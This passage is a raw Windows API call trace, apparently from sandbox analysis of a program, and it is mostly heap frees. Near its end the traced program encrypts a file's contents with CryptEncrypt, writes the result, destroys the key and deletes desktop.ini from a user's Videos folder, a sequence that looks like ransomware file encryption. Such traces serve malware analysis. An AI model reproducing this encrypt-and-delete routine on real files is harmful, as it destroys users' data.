(in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0096.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0096.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0096.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0096.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0096.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0096.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0096.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0096.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0096.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0096.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0096.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0096.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0096.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0096.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0096.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0096.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0096.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0096.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0096.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0096.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0096.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0096.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0096.755] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0096.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0096.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0096.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0096.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0096.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0096.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0096.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eada8 | out: hHeap=0x1780000) returned 1 [0096.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0096.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0096.756] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0096.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0096.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0096.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0096.756] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0096.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0096.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0096.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0096.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0096.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0096.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0096.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0096.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0096.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0096.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0096.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0096.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0096.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0096.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0096.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0096.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac040 | out: hHeap=0x1780000) returned 1 [0096.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0096.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0096.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0096.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0096.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0096.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0096.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2668 | out: hHeap=0x1780000) returned 1 [0096.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0096.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0096.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0096.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0096.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0096.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0096.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0096.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0096.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0096.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0096.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0096.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0096.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0096.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0096.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0096.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0096.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0096.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0096.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0096.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f50 | out: hHeap=0x1780000) returned 1 [0096.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0096.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0096.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0096.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0096.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0096.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0096.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0096.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0096.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0096.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0096.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0096.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0096.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0096.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca058 | out: hHeap=0x1780000) returned 1 [0096.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0096.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0096.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0096.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0096.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0096.758] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0096.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0096.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0096.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0096.758] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0096.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0096.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0096.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0096.758] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0096.758] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0096.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0096.758] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0096.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0096.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0096.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0096.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0096.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0096.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0096.759] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0096.759] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0096.759] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0096.903] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0096.903] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0096.903] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.904] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca3e8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0096.904] CryptEncrypt (in: hKey=0x41ac100, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x1f8, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x200) returned 1 [0096.904] CharLowerBuffW (in: lpsz="byte[513]", cchLength=0x9 | out: lpsz="byte[513]") returned 0x9 [0096.904] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0096.904] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0096.904] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.904] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca640, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0096.904] CryptEncrypt (in: hKey=0x41ac100, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x43e8c88*, pdwDataLen=0x144e790*=0x1f8, dwBufLen=0x200 | out: pbData=0x43e8c88*, pdwDataLen=0x144e790*=0x200) returned 1 [0096.904] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0096.904] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0096.904] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0096.904] WriteFile (in: hFile=0x298, lpBuffer=0x43e8288*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x43e8288*, lpNumberOfBytesWritten=0x144f194*=0x200, lpOverlapped=0x0) returned 1 [0096.905] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0096.905] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0096.906] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0096.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0096.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca178, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0096.906] CryptDestroyKey (hKey=0x41ac100) returned 1 [0096.906] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0096.906] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0096.906] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0096.906] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0096.906] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0096.906] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0096.906] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0096.906] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0096.906] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0096.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0096.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796e88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0096.906] CryptReleaseContext (hProv=0x41a5360, dwFlags=0x0) returned 1 [0096.906] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0096.906] FreeLibrary (hLibModule=0x756e0000) returned 1 [0096.906] CloseHandle (hObject=0x258) returned 1 [0096.907] CloseHandle (hObject=0x298) returned 1 [0096.908] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\desktop.ini", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\desktop.ini", lpFilePart=0x0) returned 0x22 [0096.908] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\videos\\desktop.ini")) returned 0x26 [0096.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0096.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0096.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0096.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0096.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0096.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0096.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0096.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0096.908] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\desktop.ini", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x43f94523, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x43f94523, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce317778, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="desktop.ini", cAlternateFileName="")) returned 0x41ac180 [0096.908] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\videos\\desktop.ini")) returned 1 [0096.909] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x43f94523, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x43f94523, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce317778, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0096.909] FindClose (in: hFindFile=0x41ac180 | out: hFindFile=0x41ac180) returned 1 [0096.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0096.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0096.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0096.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0096.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a500 | out: hHeap=0x1780000) returned 1 [0096.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0096.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0096.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0096.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf400 | out: hHeap=0x1780000) returned 1 [0096.910] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0096.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0096.910] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0096.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0096.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0096.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0096.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9938 | out: hHeap=0x1780000) returned 1 [0096.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0096.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0096.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0096.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0096.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0096.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050e78 | out: hHeap=0x1780000) returned 1 [0096.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0096.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0096.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9920 | out: hHeap=0x1780000) returned 1 [0096.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0096.910] PeekMessageW (in: lpMsg=0x144f78c, 